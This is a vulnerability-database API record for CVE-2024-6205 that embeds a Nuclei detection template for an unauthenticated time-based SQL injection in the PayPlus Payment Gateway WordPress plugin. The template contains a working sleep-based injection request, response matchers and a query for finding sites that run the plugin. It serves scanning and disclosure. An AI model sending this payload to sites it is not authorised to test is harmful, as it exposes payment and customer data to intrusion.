{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-6205/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-6205/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-6205/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-6205/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-6205/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-6205"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-6205"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-6205.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-6205\n\ninfo:\n  name: PayPlus Payment Gateway < 6.6.9 - SQL Injection\n  author: s4e-io\n  severity: critical\n  description: |\n    The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.\n  impact: |\n    Unauthenticated attackers can execute time-based SQL injection through WooCommerce API routes to extract sensitive payment information, customer data, and database credentials.\n  remediation: |\n    Update PayPlus Payment Gateway plugin to version 6.6.9 or later to address the SQL injection vulnerability.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection\n    - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-6205\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-6205\n    cwe-id: CWE-89\n    epss-score: 0.04134\n    epss-percentile: 0.90442\n  metadata:\n    max-request: 1\n    vendor: payplus-ltd\n    product: payplus-payment-gateway\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/payplus-payment-gateway\"\n  tags: time-based-sqli,wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout 20s\n        GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=6\"\n          - \"status_code == 302\"\n          - \"regex('^-1$', body)\"\n          - 'contains(content_type,\"text/html\")'\n        condition: and\n# digest: 4b0a00483046022100c002708e9b4544f3cf42bb9fad50348f802abb21bfe08db72565fd797feb0f010221009bab663fdbf08eaf3e6980687ca2dfd0cf7867554799c2dea7ba982521e42d59:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-6205"
}